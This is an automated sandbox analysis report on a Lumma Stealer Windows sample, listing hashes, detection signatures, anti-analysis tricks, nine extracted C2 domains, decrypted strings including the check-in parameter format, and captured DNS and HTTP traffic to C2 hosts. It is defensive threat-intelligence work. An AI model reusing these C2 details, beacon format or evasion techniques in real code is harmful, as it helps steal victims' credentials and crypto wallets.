Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mgEXk8ip26.exe

Overview

General Information

Sample name:mgEXk8ip26.exe
renamed because original name is a hash value
Original sample name:f54dd0914c65108d5f72049dc5490f53.exe
Analysis ID:1579774
MD5:f54dd0914c65108d5f72049dc5490f53
SHA1:2698c99f98e65b28f31f9bdc0e68b6941de38f2a
SHA256:4a2803914a4269806a4cb5525ec40edaf2274e496d0e9d87be9988d1da4b02d5
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • mgEXk8ip26.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\mgEXk8ip26.exe" MD5: F54DD0914C65108D5F72049DC5490F53)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["crosshuaht.lat", "discokeyus.lat", "necklacebudi.lat", "grannyejh.lat", "sustainskelet.lat", "aspecteirs.lat", "energyaffai.lat", "sweepyribs.lat", "rapeflowwj.lat"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:54:23.614149+010020283713Unknown Traffic192.168.2.649716104.102.49.254443TCP
      2024-12-23T08:54:26.067424+010020283713Unknown Traffic192.168.2.649718104.21.66.86443TCP
      2024-12-23T08:54:27.799756+010020283713Unknown Traffic192.168.2.649724104.21.66.86443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:54:26.821285+010020546531A Network Trojan was detected192.168.2.649718104.21.66.86443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:54:26.821285+010020498361A Network Trojan was detected192.168.2.649718104.21.66.86443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:54:21.094658+010020583541Domain Observed Used for C2 Detected192.168.2.6506541.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:54:21.632866+010020583581Domain Observed Used for C2 Detected192.168.2.6502751.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:54:20.294323+010020583601Domain Observed Used for C2 Detected192.168.2.6638951.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:54:20.870488+010020583621Domain Observed Used for C2 Detected192.168.2.6531021.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:54:19.975155+010020583641Domain Observed Used for C2 Detected192.168.2.6638601.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:54:20.620674+010020583701Domain Observed Used for C2 Detected192.168.2.6534481.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:54:21.858780+010020583741Domain Observed Used for C2 Detected192.168.2.6504181.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:54:21.321849+010020583761Domain Observed Used for C2 Detected192.168.2.6533141.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:54:19.829160+010020583781Domain Observed Used for C2 Detected192.168.2.6537981.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-23T08:54:24.399645+010028586661Domain Observed Used for C2 Detected192.168.2.649716104.102.49.254443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: mgEXk8ip26.exeAvira: detected
      Found malware configuration
      Source: mgEXk8ip26.exe.7352.1.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["crosshuaht.lat", "discokeyus.lat", "necklacebudi.lat", "grannyejh.lat", "sustainskelet.lat", "aspecteirs.lat", "energyaffai.lat", "sweepyribs.lat", "rapeflowwj.lat"], "Build id": "PsFKDg--pablo"}
      Multi AV Scanner detection for submitted file
      Source: mgEXk8ip26.exeVirustotal: Detection: 51%Perma Link
      Source: mgEXk8ip26.exeReversingLabs: Detection: 57%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for sample
      Source: mgEXk8ip26.exeJoe Sandbox ML: detected
      Sample uses string decryption to hide its real strings
      Source: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: rapeflowwj.lat
      Source: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: crosshuaht.lat
      Source: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: sustainskelet.lat
      Source: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: aspecteirs.lat
      Source: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: energyaffai.lat
      Source: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacebudi.lat
      Source: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: discokeyus.lat
      Source: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: grannyejh.lat
      Source: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: sweepyribs.lat
      Source: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
      Source: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
      Source: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
      Source: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
      Source: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: PsFKDg--pablo
      Source: mgEXk8ip26.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49718 version: TLS 1.2
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]1_2_009FC767
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]1_2_009CB70C
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov edx, ecx1_2_009C9C4A
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov ebx, esi1_2_009E2190
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov word ptr [ebx], cx1_2_009E2190
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h1_2_009E2190
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]1_2_009D6263
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then jmp dword ptr [00A0450Ch]1_2_009D8591
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h1_2_009F85E0
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then jmp eax1_2_009F85E0
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov eax, dword ptr [00A0473Ch]1_2_009DC653
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]1_2_009DE7C0
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_009EA700
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov ebx, edx1_2_009CC8B6
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+4B6A4A26h]1_2_009CC8B6
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov edx, ecx1_2_009F8810
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh1_2_009F8810
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh1_2_009F8810
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then test eax, eax1_2_009F8810
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov byte ptr [edi], al1_2_009D682D
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]1_2_009D682D
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]1_2_009D682D
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then push ebx1_2_009FCA93
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov byte ptr [edi], cl1_2_009ECAD0
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov byte ptr [edi], cl1_2_009ECA49
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then cmp al, 2Eh1_2_009E6B95
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov byte ptr [edi], cl1_2_009ECB11
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov byte ptr [edi], cl1_2_009ECB22
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov word ptr [eax], cx1_2_009DCB40
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov word ptr [esi], cx1_2_009DCB40
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov word ptr [eax], cx1_2_009E8B61
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]1_2_009FECA0
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]1_2_009E8D93
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov ecx, eax1_2_009FAEC0
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]1_2_009FEFB0
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al1_2_009C8F50
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov byte ptr [edi], bl1_2_009C8F50
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then push C0BFD6CCh1_2_009E3086
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then push C0BFD6CCh1_2_009E3086
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov word ptr [ecx], dx1_2_009E91DD
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]1_2_009E91DD
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h1_2_009FB1D0
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov ebx, eax1_2_009FB1D0
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]1_2_009EB170
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov word ptr [ebx], ax1_2_009DB2E0
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]1_2_009D5220
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]1_2_009D7380
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h1_2_009DD380
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]1_2_009FF330
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov word ptr [ecx], dx1_2_009E91DD
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]1_2_009E91DD
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]1_2_009C74F0
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]1_2_009C74F0
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]1_2_009D7380
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_009F5450
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then xor edi, edi1_2_009D759F
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov ecx, eax1_2_009C9580
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov word ptr [ebp+00h], ax1_2_009C9580
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov esi, eax1_2_009D5799
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov ecx, eax1_2_009D5799
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then movzx eax, word ptr [edx]1_2_009D97C2
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov word ptr [edi], dx1_2_009D97C2
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov word ptr [esi], cx1_2_009D97C2
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov word ptr [ecx], bp1_2_009DD83A
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then jmp eax1_2_009E984F
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]1_2_009E3860
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov ebx, eax1_2_009C5990
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov ebp, eax1_2_009C5990
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]1_2_009D79C1
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then push esi1_2_009E7AD3
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov byte ptr [esi], al1_2_009EDA53
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov ebx, eax1_2_009CDBD9
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov ebx, eax1_2_009CDBD9
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then push 00000000h1_2_009E9C2B
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]1_2_009D7DEE
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then jmp dword ptr [00A055F4h]1_2_009E5E30
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov edx, ebp1_2_009E5E70
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then jmp ecx1_2_009CBFFD
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov ecx, ebx1_2_009EDFE9
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov byte ptr [esi], al1_2_009DBF14
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]1_2_009D9F30

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.6:63895 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.6:50654 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.6:53798 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.6:50275 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.6:53314 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.6:53448 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.6:50418 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.6:53102 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.6:63860 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49716 -> 104.102.49.254:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49718 -> 104.21.66.86:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49718 -> 104.21.66.86:443
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: crosshuaht.lat
      Source: Malware configuration extractorURLs: discokeyus.lat
      Source: Malware configuration extractorURLs: necklacebudi.lat
      Source: Malware configuration extractorURLs: grannyejh.lat
      Source: Malware configuration extractorURLs: sustainskelet.lat
      Source: Malware configuration extractorURLs: aspecteirs.lat
      Source: Malware configuration extractorURLs: energyaffai.lat
      Source: Malware configuration extractorURLs: sweepyribs.lat
      Source: Malware configuration extractorURLs: rapeflowwj.lat
      Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
      Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49724 -> 104.21.66.86:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49716 -> 104.102.49.254:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 104.21.66.86:443
      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytim equals www.youtube.com (Youtube)
      Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
      Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
      Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
      Source: global trafficDNS traffic detected: DNS query: necklacebudi.lat
      Source: global trafficDNS traffic detected: DNS query: energyaffai.lat
      Source: global trafficDNS traffic detected: DNS query: aspecteirs.lat
      Source: global trafficDNS traffic detected: DNS query: sustainskelet.lat
      Source: global trafficDNS traffic detected: DNS query: crosshuaht.lat
      Source: global trafficDNS traffic detected: DNS query: rapeflowwj.lat
      Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
      Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.c
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
      Source: mgEXk8ip26.exe, 00000001.00000003.2241034266.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260488098.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aspecteirs.lat:443/api
